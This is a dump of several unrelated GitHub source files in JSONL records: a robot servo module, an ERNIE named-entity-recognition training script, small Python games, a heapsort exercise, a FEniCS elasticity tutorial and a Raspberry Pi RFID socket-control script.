-1.1574288723751871, -0.82673490883941936,\n -0.49604094530365161, -0.16534698176788387,\n 0.16534698176788387, 0.49604094530365161, 0.82673490883941891,\n 1.1574288723751867, 1.4881228359109544, 1.8188167994467221,\n 2.1495107629824899, 2.4802047265182576, 2.8108986900540254,\n 3.1415926535897931\n ]\n # Sort lists\n indexes = range(len(phis))\n sorted_dofs = map(dofs.__getitem__, indexes)\n\n # Create interpolation instance\n self._interp_poly = interpolate.interp1d(phis, sorted_dofs, kind=\"linear\")\n\n def calc(self, r, phi, anim_time=-1):\n \"\"\"\n Calculate dof value with the polygon, according to the given r and phi.\n\n :param float r: radius r, intensity of the emotion.\n :param float phi: (radians) angle of the emotion in the circumplex.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n \"\"\"\n # print_info('Calc; r: %d, phi: %d, time: %i' % (r, phi, anim_time))\n # Calculate DOF position at max intensity\n\n if phi > 0:\n phi -= math.pi\n elif phi <= 0:\n phi += math.pi\n\n dof_at_max_r = float(self._interp_poly(phi))\n\n # Interpolate between neutral DOF pos and max intensity DOF pos\n self.set_value(float(self._neutral) + (r * (dof_at_max_r - float(self._neutral))), anim_time)\n\n # # Execute overlays\n # for overlay_fn in self.overlays:\n # try:\n # self.set_value(overlay_fn(self.value, self), anim_time)\n # except TypeError:\n # # Not a callable object, or function does not take 2 args\n # pass\n\n def set_value(self, dof_value=0, anim_time=-1, is_overlay=False, update_last_set_time=True):\n \"\"\"\n Sets the dof value. If the dof value is 2 or larger, set it to a random value.\n\n :param float dof_value: new value of the dof.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n :param bool is_overlay: used to determine what priority the dof value has (overlay > default).\n :param bool update_last_set_time: update the last set timer of the dof.\n \"\"\"\n # print_info('Set value: %d, time: %i' % (dof_value, anim_time))\n if dof_value >= 2:\n dof_value = random.uniform(-1, 1)\n dof_value = float(constrain(float(dof_value), -1.0, 1.0))\n self.to_value = dof_value\n\n # Apply transition animation\n if anim_time < 0:\n anim_time = float(abs(dof_value - float(self.value))) / 1.0\n\n self._anim = Animate([0, anim_time], [self.value, dof_value])\n\n if not is_overlay:\n self.last_set_value = dof_value\n\n if update_last_set_time:\n self.last_set_time = int(round(time.time() * 1000))\n\n def set_overlay_value(self, dof_value=0, anim_time=-1, update_last_set_time=True):\n \"\"\"\n Sets the overlay value and overwrites the dof position.\n\n :param float dof_value: new overlay value of the dof.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n :param bool update_last_set_time: update the last set timer of the dof.\n \"\"\"\n self.set_value(dof_value, anim_time, True, update_last_set_time)\n\n def reset_overlay(self, anim_time=-1):\n \"\"\"\n Clears the overlay value and resets the dof position to the last set value.\n\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n \"\"\"\n\n self.set_value(self.last_set_value, anim_time)\n\n def update(self):\n \"\"\"\n Updates the dof value according to the animation.\n\n :return: True if dof value is updated, False if dof value did not change.\n :rtype: bool\n \"\"\"\n if self._anim is not None:\n self.value = float(self._anim())\n if self._anim is None or self._anim.has_ended():\n self._anim = None\n return True\n return False\n\n # def add_overlay(self, fn):\n # self.overlays.append(fn)\n #\n # def remove_overlay(self, fn):\n # self.overlays.remove(fn)\n #\n # def clear_overlays(self):\n # self.overlays = []\n","repo_name":"OPSORO/OS","sub_path":"src/opsoro/dof/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"1111028056","text":"import os\nimport numpy as np\nimport random\nimport argparse\nimport mxnet as mx\nimport logging\nimport gluonnlp as nlp\n\nfrom ner_utils import get_context, str2bool, get_ernie_model, dump_metadata\nfrom data import ERNIETaggingDataset, convert_arrays_to_text\nfrom model import ERNIETagger, attach_prediction\n\n# seqeval is a dependency that is specific to named entity recognition.\nimport seqeval.metrics\n\nlogging.getLogger().setLevel(logging.DEBUG)\n\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Train a ERNIE-based named entity recognition model',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # data file paths\n arg_parser.add_argument('--train-path', type=str, default=\"./data/english_good_name/train.txt\",\n help='Path to the training data file')\n arg_parser.add_argument('--dev-path', type=str, default=\"./data/english_good_name/dev.txt\",\n help='Path to the development data file')\n arg_parser.add_argument('--test-path', type=str, default=\"./data/english_good_name/test.txt\",\n help='Path to the test data file')\n\n arg_parser.add_argument('--save-checkpoint-prefix', type=str, default=\"./model/english_good_name/model\",\n help='Prefix of model checkpoint file')\n\n # bert options\n arg_parser.add_argument('--ernie-model', type=str, default='bert_12_768_12',\n help='Name of the ERNIE model')\n arg_parser.add_argument('--cased', type=str2bool, default=False,\n help='Path to the development data file')\n arg_parser.add_argument('--dropout-prob', type=float, default=0.1,\n help='Dropout probability for the last layer')\n\n # optimization parameters\n arg_parser.add_argument('--seed', type=int, default=13531,\n help='Random number seed.')\n arg_parser.add_argument('--seq-len', type=int, default=256,\n help='The length of the sequence input to BERT.'\n ' An exception will raised if this is not large enough.')\n arg_parser.add_argument('--gpu', type=int, default=0,\n help='Number (index) of GPU to run on, e.g. 0. '\n 'If not specified, uses CPU.')\n arg_parser.add_argument('--batch-size', type=int, default=16, help='Batch size for training')\n arg_parser.add_argument('--num-epochs', type=int, default=10, help='Number of epochs to train')\n arg_parser.add_argument('--optimizer', type=str, default='adam',\n help='Optimization algorithm to use')\n arg_parser.add_argument('--learning-rate', type=float, default=5e-5,\n help='Learning rate for optimization')\n arg_parser.add_argument('--warmup-ratio', type=float, default=0.1,\n help='Warmup ratio for learning rate scheduling')\n args = arg_parser.parse_args()\n return args\n\ndef main(config):\n ctx = get_context(0)\n\n ernie_model, vocab = get_ernie_model(args.ernie_model, args.cased, ctx, args.dropout_prob)\n tag_list = [\"EN-B\", \"EN-I\", \"O\"]\n\n dataset = ERNIETaggingDataset(text_vocab=vocab, train_path=config.train_path, dev_path=config.dev_path,\n test_path=config.test_path, seq_len=config.seq_len, is_cased=config.cased,\n tag_list=tag_list)\n train_data_loader = dataset.get_train_data_loader(config.batch_size)\n dev_data_loader = dataset.get_dev_data_loader(config.batch_size)\n test_data_loader = dataset.get_test_data_loader(config.batch_size)\n\n net = ERNIETagger(ernie_model, dataset.num_tag_types, config.dropout_prob)\n net.tag_classifier.initialize(init=mx.init.Normal(0.02), ctx=ctx)\n net.hybridize(static_alloc=True)\n\n #loss\n loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()\n loss.hybridize(static_alloc=True)\n\n setp_size = config.batch_size\n max_num_train_steps = (int(len(dataset.train_inputs)) * config.num_epochs) / setp_size\n num_wramup_steps = int(max_num_train_steps * config.warmup_ratio)\n\n #optimizer\n optimizer_params = {\"learning_rate\": config.learning_rate}\n trainer = mx.gluon.Trainer(net.collect_params(), config.optimizer, optimizer_params)\n\n # collect differentiable parameters\n logging.info('Collect params...')\n # do not apply weight decay on LayerNorm and bias terms\n for _, v in net.collect_params('.*beta|.*gamma|.*bias').items():\n v.wd_mult = 0.0\n params = [p for p in net.collect_params().values() if p.grad_req != 'null']\n\n if config.save_checkpoint_prefix is not None:\n logging.info('dumping metadata...')\n dump_metadata(config, tag_vocab=dataset.tag_vocab)\n\n def train(data_loader, start_step_num):\n \"\"\"Training loop.\"\"\"\n step_num = start_step_num\n # logging.info('current starting step num: %d', step_num)\n for batch_id, (_, _, _, tag_ids, flag_nonnull_tag, out) in \\\n enumerate(attach_prediction(data_loader, net, ctx, is_train=True)):\n # logging.info('training on batch index: %d/%d', batch_id, len(data_loader))\n\n # step size adjustments\n #leearning_rate decay\n step_num += 1\n if step_num < num_wramup_steps:\n new_lr = config.learning_rate * step_num / num_wramup_steps\n else:\n offset = ((step_num - num_wramup_steps) * config.learning_rate /\n (max_num_train_steps - num_wramup_steps))\n new_lr = config.learning_rate - offset\n trainer.set_learning_rate(new_lr)\n\n with mx.autograd.record():\n loss_value = loss(out, tag_ids,\n flag_nonnull_tag.expand_dims(axis=2)).mean()\n\n loss_value.backward()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.step(1)\n\n pred_tags = out.argmax(axis=-1)\n # logging.info('loss_value: %6f', loss_value.asscalar())\n\n num_tag_preds = flag_nonnull_tag.sum().asscalar()\n logging.info(\n 'loss_value: %6f, accuracy: %6f', loss_value.asscalar(), (((pred_tags == tag_ids) * flag_nonnull_tag).sum().asscalar()\n / num_tag_preds))\n return step_num\n\n def evaluate(data_loader):\n \"\"\"Eval loop.\"\"\"\n predictions = []\n\n for batch_id, (text_ids, _, valid_length, tag_ids, _, out) in \\\n enumerate(attach_prediction(data_loader, net, ctx, is_train=False)):\n # logging.info('evaluating on batch index: %d/%d', batch_id, len(data_loader))\n\n # convert results to numpy arrays for easier access\n np_text_ids = text_ids.astype('int32').asnumpy()\n np_pred_tags = out.argmax(axis=-1).asnumpy()\n np_valid_length = valid_length.astype('int32').asnumpy()\n np_true_tags = tag_ids.asnumpy()\n\n predictions += convert_arrays_to_text(vocab, dataset.tag_vocab, np_text_ids,\n np_true_tags, np_pred_tags, np_valid_length)\n\n all_true_tags = [[entry.true_tag for entry in entries] for entries in predictions]\n all_pred_tags = [[entry.pred_tag for entry in entries] for entries in predictions]\n seqeval_f1 = seqeval.metrics.f1_score(all_true_tags, all_pred_tags)\n return seqeval_f1\n\n best_dev_f1 = 0.0\n last_test_f1 = 0.0\n best_epoch = -1\n\n last_epoch_step_num = 0\n for epoch_index in range(config.num_epochs):\n last_epoch_step_num = train(train_data_loader, last_epoch_step_num)\n train_f1 = evaluate(train_data_loader)\n dev_f1 = evaluate(dev_data_loader)\n if dev_f1 > best_dev_f1:\n best_dev_f1 = dev_f1\n best_epoch = epoch_index\n # logging.info('update the best dev f1 to be: %3f', best_dev_f1)\n test_f1 = evaluate(test_data_loader)\n logging.info('test f1: %3f', test_f1)\n last_test_f1 = test_f1\n\n # save params\n params_file = config.save_checkpoint_prefix + '_{:03d}.params'.format(epoch_index)\n # logging.info('saving current checkpoint to: %s', params_file)\n net.save_parameters(params_file)\n\n logging.info('epoch: %d, current_best_epoch: %d, train_f1: %3f, dev_f1: %3f, previous_best_dev f1: %3f',\n epoch_index, best_epoch, train_f1, dev_f1, best_dev_f1)\n\n # logging.info('current best epoch: %d', best_epoch)\n\n logging.info('best epoch: %d, best dev f1: %3f, test f1 at tha epoch: %3f',\n best_epoch, best_dev_f1, last_test_f1)\n\n\nif __name__ == \"__main__\":\n print(\"Ernie Ner\")\n args = parse_args()\n main(args)\n","repo_name":"wang91zhe/NER_Model","sub_path":"finetune_ernie.py","file_name":"finetune_ernie.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"39578135542","text":"from engine import *\n\n\nclass Ship:\n def __init__(self):\n self.pos = engine.viewport / 2\n self.vel = Vector(0.0, 0.0)\n self.r = 10.0\n self.heading = 0.0\n self.boosting = False\n\n def update(self):\n self.pos += self.vel\n if not self.boosting:\n self.vel *= 0.9\n\n def boost(self):\n self.vel += Vector.from_angle(self.heading) * 0.0005\n self.boosting = True\n\n def rotate(self, rotation):\n self.heading += rotation\n\n def hits(self, asteroid):\n d = self.pos.dist(asteroid.pos)\n return d < self.r + asteroid.r\n\n def render(self):\n engine.push()\n\n engine.translate(self.pos)\n engine.rotate(self.heading + np.pi / 2)\n\n engine.fill = 0\n engine.stroke = 255\n engine.weight = 1\n\n angle = self.heading + np.pi / 2\n engine.triangle(Vector(-self.r, self.r), Vector(self.r, self.r), Vector(0, -self.r))\n\n if self.boosting:\n offset = self.r * 0.25\n engine.triangle(\n Vector(-self.r + offset, self.r),\n Vector(self.r - offset, self.r),\n Vector(0, self.r + offset),\n )\n self.boosting = False\n\n engine.pop()\n\n def edges(self):\n if self.pos.x > engine.width + self.r:\n self.pos.x = -self.r\n elif self.pos.x < -self.r:\n self.pos.x = engine.width + self.r\n\n if self.pos.y > engine.height + self.r:\n self.pos.y = -self.r\n elif self.pos.y < -self.r:\n self.pos.y = engine.height + self.r\n\n\nclass Laser:\n def __init__(self, ship):\n self.pos = ship.pos.copy()\n self.vel = ship.vel + Vector.from_angle(ship.heading) * 10.0\n\n def update(self):\n self.pos += self.vel\n\n def render(self):\n engine.push()\n\n engine.fill = 255\n engine.stroke = 255\n engine.weight = 4\n\n engine.circle(self.pos, 4)\n\n engine.pop()\n\n def hits(self, asteroid):\n d = self.pos.dist(asteroid.pos)\n return d < asteroid.r\n\n def off_screen(self):\n return (\n self.pos.x < 0\n or engine.width < self.pos.x\n or self.pos.y < 0\n or engine.height < self.pos.y\n )\n\n\nclass Asteroid:\n def __init__(self, pos=None, r=None):\n if pos is None:\n self.pos = random(engine.viewport)\n else:\n self.pos = pos.copy()\n self.vel = Vector.random(2)\n\n if r is None:\n self.r = random(15, 50)\n else:\n self.r = r * 0.5\n\n self.total = int(random(10, 30))\n self.offset = [random(-self.r * 0.25, self.r * 0.25) for _ in range(self.total)]\n\n def update(self):\n self.pos += self.vel\n\n def render(self):\n engine.push()\n\n engine.fill = None\n engine.stroke = 255\n engine.weight = 1\n\n engine.translate(self.pos)\n\n points = []\n for i, offset in enumerate(self.offset):\n angle = map(i, 0, self.total, 0, 2 * np.pi)\n points.append(Vector.from_angle(angle) * (self.r + offset))\n engine.polygon(*points)\n\n engine.pop()\n\n def breakup(self):\n return [Asteroid(self.pos, self.r), Asteroid(self.pos, self.r)]\n\n def edges(self):\n if self.pos.x > engine.width + self.r:\n self.pos.x = -self.r\n elif self.pos.x < -self.r:\n self.pos.x = engine.width + self.r\n\n if self.pos.y > engine.height + self.r:\n self.pos.y = -self.r\n elif self.pos.y < -self.r:\n self.pos.y = engine.height + self.r\n\n\nif __name__ == \"__main__\":\n engine.size(800, 600, OPENGL)\n\n ship = Ship()\n asteroids = [Asteroid() for _ in range(5)]\n lasers = []\n score = 0\n\n def gameover():\n global ship, asteroids, lasers, score\n ship = Ship()\n asteroids = [Asteroid() for _ in range(5)]\n lasers = []\n score = 0\n\n @engine.draw\n def draw():\n global score\n\n engine.background = 0\n\n for a in asteroids:\n if ship.hits(a):\n gameover()\n return\n a.update()\n a.edges()\n a.render()\n\n for l in lasers.copy():\n l.update()\n l.render()\n if l.off_screen():\n lasers.remove(l)\n else:\n for a in asteroids.copy():\n if l.hits(a):\n if a.r > 10:\n score += 1\n asteroids.extend(a.breakup())\n asteroids.remove(a)\n lasers.remove(l)\n break\n\n ship.update()\n ship.edges()\n ship.render()\n\n engine.text(score, Vector(0, 0))\n\n @engine.event\n def key_pressed(e):\n if e.key == \" \":\n lasers.append(Laser(ship))\n\n @engine.event\n def key_held(e):\n if e.key_code == \"right\":\n ship.rotate(0.0001)\n if e.key_code == \"left\":\n ship.rotate(-0.0001)\n if e.key_code == \"up\":\n ship.boost()\n\n engine.start()\n","repo_name":"Mimer29or40/PyEngine","sub_path":"src/CodingTrainOld/046 - Asteroids.py","file_name":"046 - Asteroids.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72294892669","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\ntr = {}\n\nfd = open('transcription.csv', 'r')\nfor line in fd.readlines():\n\tline = line.strip('\\n')\n\tq = line.split(',')\n\ttr[q[0]]=q[1]\n\n\n\ntext = sys.stdin.read()\n\nsentence = text.split('\\n')\n\nfor k, v in tr.items():\n\ttrans_text = text.replace(k,v)\n\nprint(trans_text)\n\n","repo_name":"janemurzinova/2017-osnov-programm","sub_path":"homework/transliterate.py","file_name":"transliterate.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14770229306","text":"\"\"\"\nFor a given array let:\n\n Parent(i)=floor(i/2)\n Left(i)=2i\n Right(i)=2i+1\n\n An array has the max heap property if:\n array[ Parent(i) ] >= array[ i ]\n\n We also say that the corresponding binary tree is a Max Heap\n\n Notes:\n --> In a Max Heap array A the element with the highest\n value is in the root\n\n --> The values of the elements lying on a root-leave-path\n are monotonically decreasing\n\n --> The height of the tree of the tree i.e.\n length of the longest root-leave-path is floor(log(n))\n\n\"\"\"\n\n\ndef max_heapify(array, root):\n \"\"\"\n Restore max heap property in the i-th element\n\n :param array: list\n :param i: integer\n :return:\n \"\"\"\n print(array)\n while True:\n left_child = 2*i\n right_child = 2*i + 1\n print(left_child, right_child)\n n = len(array)\n\n if left_child <= n and array[left_child] > array[i]:\n largest = left_child\n else:\n largest = i\n print(right_child)\n print('largest index',largest)\n if right_child <= n and array[right_child] > array[largest]:\n largest = right_child\n print(array[largest])\n\n if largest != i:\n a, b = array.index(array[i]), array.index(array[largest])\n array[b], array[a] = array[a], array[b]\n print(largest)\n return max_heapify(array, largest)\n\nprint(max_heapify([1, 2, 3, 4, 5], 0))\n\n","repo_name":"supenova1604/sorting","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10947693574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 23 20:58:46 2019\n\n@author: daniel\n\"\"\"\n\n\"\"\"\nFEniCS tutorial demo program: Linear elastic problem.\n\n -div(sigma(u)) = f\n sigma(epsilon) = lambda*tr(epsilon)*I + 2*mu*epsilon\n epsilon(u) = (1/2) * (grad(u) + transpose(grad(u)))\n\nThe model is used to simulate an elastic beam clamped at\nits left end and deformed under its own weight.\n\"\"\"\n\nimport fenics as fs\nimport matplotlib.pyplot as plt\n\n# scaled variables\nL = 1\nW = 0.2\nmu = 1\nrho = 1\ndelta = W/ L\ngamma = 0.4 * delta**2\nbeta = 1.25\nlambda_ = beta\ng = gamma\n\n# Create mesh and define function space\nmesh = fs.BoxMesh(fs.Point(0, 0, 0), fs.Point(L, W, W), 10, 3, 3)\nV = fs.VectorFunctionSpace(mesh, 'P', 1)\n\n# define boundary condition\ntol = 1e-14\n\ndef clamped_boundary(x, on_boundary):\n return on_boundary and x[0] < tol\n\nbc = fs.DirichletBC(V, fs.Constant((0, 0, 0)), clamped_boundary)\n\n# define strain and stress\ndef epsilon(u):\n return 0.5 * (fs.nabla_grad(u) + fs.nabla_grad(u).T)\n\ndef sigma(u):\n return lambda_*fs.nabla_grad(u)*fs.Identity(d) + 2*mu*epsilon(u)\n\n# Define variational problem\nu = fs.TrialFunction(V)\nd = u.geometric_dimension()\nv = fs.TestFunction(V)\nf = fs.Constant((0, 0, -rho*g))\nT = fs.Constant((0, 0, 0))\na = fs.inner(sigma(u), epsilon(v))*fs.dx\nL = fs.dot(f, v)*fs.dx + fs.dot(T, v)*fs.ds\n\n# Compute solution\nu = fs.Function(V)\nfs.solve(a == L, u, bc)\n\n# Plot solution\nplt.figure()\nfs.plot(u, title='Displacement', mode='displacement')\n\n# Plot stress\ns = sigma(u) - (1./3)*fs.tr(sigma(u))*fs.Identity(d) # deviatoric stress\nvon_Mises = fs.sqrt(3./2*fs.inner(s, s))\nV = fs.FunctionSpace(mesh, 'P', 1)\nvon_Mises = fs.project(von_Mises, V)\nplt.figure()\nfs.plot(von_Mises, title='Stress intensity')\n\n# Compute magnitude of displacement\nu_magnitude = fs.sqrt(fs.dot(u, u))\nu_magnitude = fs.project(u_magnitude, V)\nplt.figure()\nfs.plot(u_magnitude, title='Displacement magnitude')\nprint('min/max u:', u_magnitude.vector().min(), u_magnitude.vector().max())\n\n# Save solution to file in VTK format\nfs.File('results/displacement.pvd') << u\nfs.File('results/von_mises.pvd') << von_Mises\nfs.File('results/magntiude.pvd') << u_magnitude","repo_name":"danielwboyce/fenicstutorials","sub_path":"db_ft06_elasticity/db_ft06_elasticity.py","file_name":"db_ft06_elasticity.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"2662402054","text":"from tkinter import *\r\nimport time\r\nimport random\r\n\r\n\r\ndef Play(player, ai):\r\n global Draw\r\n global AI_Score\r\n global Player_Score\r\n global Player_State\r\n # Rock\r\n if player == 'Rock' and ai == 'Rock':\r\n Draw += 1\r\n Player_State = 'Draw'\r\n elif player == 'Rock' and ai == 'Paper':\r\n AI_Score += 1\r\n Player_State = 'Lose'\r\n elif player == 'Rock' and ai == 'Scissor':\r\n Player_Score += 1\r\n Player_State = 'Win'\r\n # Paper\r\n elif player == 'Paper' and ai == 'Rock':\r\n Player_Score += 1\r\n Player_State = 'Win'\r\n elif player == 'Paper' and ai == 'Paper':\r\n Draw += 1\r\n Player_State = 'Draw'\r\n elif player == 'Paper' and ai == 'Scissor':\r\n AI_Score += 1\r\n Player_State = 'Lose'\r\n # Scissor\r\n elif player == 'Scissor' and ai == 'Rock':\r\n AI_Score += 1\r\n Player_State = 'Lose'\r\n elif player == 'Scissor' and ai == 'Paper':\r\n Player_Score += 1\r\n Player_State = 'Win'\r\n elif player == 'Scissor' and ai == 'Scissor':\r\n Draw += 1\r\n Player_State = 'Draw'\r\n RPS = {'Rock': Rock_img,\r\n 'Paper': Paper_img,\r\n 'Scissor': Scissor_img}\r\n\r\n return RPS[player], RPS[ai]\r\n\r\n\r\ndef random_ai():\r\n AI = random.choice(['Rock', 'Paper', 'Scissor'])\r\n return AI\r\n\r\n\r\ndef eye(element):\r\n global eye_observer\r\n RE_active = []\r\n # /\r\n eye_observer.append(element)\r\n if len(eye_observer) > 14:\r\n eye_observer.remove(eye_observer[0])\r\n re2 = eye_observer[len(eye_observer) - 4:len(eye_observer)]\r\n re3 = eye_observer[len(eye_observer) - 6:len(eye_observer)]\r\n re4 = eye_observer[len(eye_observer) - 8:len(eye_observer)]\r\n re5 = eye_observer[len(eye_observer) - 10:len(eye_observer)]\r\n re6 = eye_observer[len(eye_observer) - 12:len(eye_observer)]\r\n re7 = eye_observer[len(eye_observer) - 14:len(eye_observer)]\r\n # //\r\n if re2[:2] == re2[2:4]:\r\n print('re2', re2)\r\n RE_active = re(re2[2:4])\r\n elif re3[:3] == re3[3:6]:\r\n print('re3', re3)\r\n RE_active = re(re3[3:6])\r\n elif re4[:4] == re4[4:8]:\r\n print('re4', re4)\r\n RE_active = re(re4[4:8])\r\n elif re5[:5] == re5[5:10]:\r\n print('re5', re5)\r\n RE_active = re(re5[5:10])\r\n elif re6[:6] == re6[6:12]:\r\n print('re6', re6)\r\n RE_active = re(re6[6:12])\r\n elif re7[:7] == re7[7:14]:\r\n print('re7', re7)\r\n RE_active = re(re7[7:14])\r\n return RE_active\r\n\r\n\r\ndef re(active_re):\r\n print('predict', active_re[0])\r\n if active_re[0] == 'Rock':\r\n active_re = 'Paper'\r\n elif active_re[0] == 'Paper':\r\n active_re = 'Scissor'\r\n elif active_re[0] == 'Scissor':\r\n active_re = 'Rock'\r\n return active_re\r\n\r\n\r\n# 'Rock', 'Paper'\r\n# Paper', 'Rock\r\n# 'Rock', 'Paper', 'Scissor',\r\n# 'Paper', 'Scissor', 'Rock'\r\n# 'Scissor', 'Rock', 'Paper'\r\n\r\n\r\ndef data():\r\n global Draw\r\n global AI_Score\r\n global Player_Score\r\n global Player_State\r\n Data = Label(text=f' {Player_State} \\n'\r\n f' Player = {Player_Score} \\n'\r\n f' AI = {AI_Score} \\n'\r\n f' Draw = {Draw} ')\r\n Data.grid(row=1, column=1)\r\n\r\n\r\ndef player_ai_show(player_img, ai_img):\r\n Player_img = Label(image=player_img)\r\n Player_img.grid(row=1, column=0)\r\n data()\r\n AI_img = Label(image=ai_img)\r\n AI_img.grid(row=1, column=2)\r\n\r\n\r\ndef player_ai_ch(player_ch):\r\n AI = ai_ch(player_ch)\r\n show = Play(player_ch, AI)\r\n player_ai_show(show[0], show[1])\r\n\r\n\r\ndef ai_ch(player_ch):\r\n global AI_predict\r\n AI = AI_predict\r\n if not AI_predict:\r\n AI = random.choice(['Rock', 'Paper', 'Scissor'])\r\n AI_predict = eye(player_ch)\r\n print(AI)\r\n return AI\r\n\r\n\r\nif __name__ == '__main__':\r\n # \\\\\r\n Draw = 0\r\n AI_Score = 0\r\n Player_Score = 0\r\n Player_State = ''\r\n eye_observer = []\r\n AI_predict = ''\r\n # \\\\\r\n window = Tk()\r\n Rock_img = PhotoImage(file='rock.gif')\r\n Paper_img = PhotoImage(file='paper.gif')\r\n Scissor_img = PhotoImage(file='scissor.gif')\r\n bm = Menubutton(text='choose')\r\n bm.menu = Menu(bm)\r\n bm[\"menu\"] = bm.menu\r\n bm.menu.add_command(image=Rock_img, command=lambda: player_ai_ch('Rock'))\r\n bm.menu.add_command(image=Paper_img, command=lambda: player_ai_ch('Paper'))\r\n bm.menu.add_command(image=Scissor_img, command=lambda: player_ai_ch('Scissor'))\r\n bm.grid(row=0, column=0)\r\n\r\n window.mainloop()\r\n","repo_name":"MagicPi-17/RPS-AI-VS-Player","sub_path":"AI RPS001.py","file_name":"AI RPS001.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"48510221","text":"class Solution:\n def numberOfMatches(self, n: int) -> int:\n result = 0\n while n > 1: \n if n % 2 == 1: \n result += (n-1) / 2 \n n = (n-1) / 2 + 1\n else: \n result += n / 2 \n n = n / 2 \n return int(result) \n\nif __name__ == \"__main__\": \n n = 7 \n s = Solution()\n assert s.numberOfMatches(n) == 6\n","repo_name":"code-cp/leetcode","sub_path":"solutions/1688/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5349276382","text":"import RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\nfrom gpiozero import LED\nimport I2C_LCD_driver\n\nimport signal\nimport time\nimport datetime\n\nimport requests\n\nclass Timeout():#class for timeout of input\n class Timeout(Exception):\n pass\n \n def __init__(self,sec):\n self.sec = sec\n \n def __enter__(self):\n signal.signal(signal.SIGALRM, self.raise_timeout)\n signal.alarm(self.sec)\n \n def __exit__(self, *args):\n signal.alarm(0)\n \n def raise_timeout(self, *args):\n raise Timeout.Timeout()\n\n\n# actuators\nreader = SimpleMFRC522()\nunlockitSocket = LED(21)\nmylcd = I2C_LCD_driver.lcd()\n\n# card values\ncurrentCard = 0\nregisteredCard = 0\ntimeLoggedIn = 0\nloginBalance = 0\nbalanceLeft = 0\nstudentName = \"\"\nstudentNumber = 0\ndecrement = 0\n\n\ndef attempt_login(url):\n global timeLoggedIn, loginBalance, studentName, studentNumber\n print(\"attempting login...\")\n response = requests.patch(url, json={'is_using': True}) \n print(response.json())\n if response.status_code == 200:\n print(\"Valid card found\")\n timeLoggedIn = time.time()\n loginBalance = response.json()['balance']\n studentName = response.json()['name']\n actuate_login()\n else:\n print(\"LOGIN FAILED: invalid card\")\n mylcd.lcd_display_string(\"Unregistered Card!\", 1)\n\n\ndef actuate_login():\n global balanceLeft, registeredCard, decrement, unlockitSocket\n balanceLeft = loginBalance\n decrement = 0\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"Hello {}!\".format(studentName), 1)\n if balanceLeft > 0:\n registeredCard = currentCard\n unlockitSocket.on()\n else:\n mylcd.lcd_display_string(\"You have no load :(\", 2)\n\ndef attempt_logout(url):\n global decrement\n print(\"attempting logout...\")\n actuate_logout()\n print(\"decrement: {}\".format(decrement))\n response = requests.patch(url, json={'decrement': int(decrement), 'is_using': False})\n print(response.json())\n if response.status_code == 200:\n print(\"LOGOUT SUCCESS\")\n else:\n print(\"LOGOUT FAILED\")\n \ndef actuate_logout():\n global registeredCard, loginBalance, balanceLeft\n registeredCard = 0\n loginBalance = 0\n unlockitSocket.off()\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"Bye {}!\".format(studentName), 1)\n print_lcd_balance(balanceLeft)\n\ndef print_lcd_balance(seconds):\n balanceOutput = datetime.timedelta(seconds=seconds)\n mylcd.lcd_display_string(\"Balance: {}\".format(balanceOutput), 2)\n\ndef main():\n global currentCard, registeredCard, timeLoggedIn, balanceLeft, decrement\n while True:\n try:\n with Timeout(1):\n currentCard = 0\n print(\"reading card...\")\n currentCard, cardText = reader.read()\n print(\"Card Found: {}\".format(currentCard))\n time.sleep(1)\n except:\n if currentCard == 0:\n print(\"No Card\")\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"No Card\", 1)\n finally:\n GPIO.cleanup()\n \n # handle login if new card found\n if registeredCard == 0 and currentCard != registeredCard:\n #if not isLoginPatching:\n attempt_login('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(currentCard))\n \n # handle logout if registered card is no more\n elif registeredCard > 0 and currentCard != registeredCard:\n #if not isLogoutPatching:\n attempt_logout('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(registeredCard))\n \n # handle balance calculations\n if registeredCard > 0:\n decrement = time.time() - timeLoggedIn\n balanceLeft = loginBalance - decrement\n balanceLeft = balanceLeft if balanceLeft > 0 else 0\n print(\"Balance left: {}\".format(balanceLeft))\n print_lcd_balance(balanceLeft)\n if balanceLeft <= 0:\n print(\"YOUR TIME IS UP, PINHEAD!\")\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"YOUR TIME IS UP!\", 2)\n 